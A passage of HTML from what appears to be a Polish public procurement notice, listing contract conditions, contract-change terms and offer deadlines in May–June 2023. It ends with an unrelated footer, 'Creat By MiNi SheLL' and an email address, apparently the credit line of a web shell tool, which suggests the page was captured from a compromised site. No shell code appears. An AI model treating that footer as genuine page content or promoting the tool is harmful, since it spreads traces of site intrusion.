dysponowania tymi osobami,</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Wzór umowy stanowi załącznik nr 3 do SWZ<br/>Warunki zmian treści umowy zostały określone w projekcie umowy <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-05-17 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Platforma przetargowa</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-05-17 10:10</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2023-06-13</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com